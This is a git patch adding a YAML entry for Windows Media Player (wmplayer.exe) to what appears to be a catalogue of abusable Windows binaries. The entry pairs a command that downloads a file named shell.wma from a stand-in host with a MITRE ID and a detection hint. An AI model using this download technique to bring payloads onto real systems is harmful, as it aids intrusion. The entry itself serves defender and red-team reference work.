From f8e6e4755fc607819d04cc755b38215b368ffdf1 Mon Sep 17 00:00:00 2001
From: pampuna <2449718+pampuna@users.noreply.github.com>
Date: Sat, 14 Dec 2024 12:15:46 +0000
Subject: [PATCH] Added technique using wmplayer.exe

---
 yml/OSBinaries/Wmplayer.yml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 yml/OSBinaries/Wmplayer.yml

diff --git a/yml/OSBinaries/Wmplayer.yml b/yml/OSBinaries/Wmplayer.yml
new file mode 100644
index 0000000..8be81e7
--- /dev/null
+++ b/yml/OSBinaries/Wmplayer.yml
@@ -0,0 +1,26 @@
+---
+Name: Wmplayer.exe
+Description: Windows Media Player
+Author: 'Rutger Flohil'
+Created: 2024-12-14
+Commands:
+  - Command: & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "http://example.com/shell.wma"
+    Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Download: INetCache
+Full_Path:
+  - Path: C:\Program Files\Windows Media Player\wmplayer.exe
+  - Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
+Code_Sample:
+  - Code: https://pampuna.nl/blog/2024/12/wmplayer.html
+Detection:
+  - IOC: Network connections originating from wmplayer.exe may be suspicious
+Resources:
+  - Link: https://pampuna.nl/blog/2024/12/wmplayer.html
+  - Person: Rutger Flohil
+    Handle: ''
\ No newline at end of file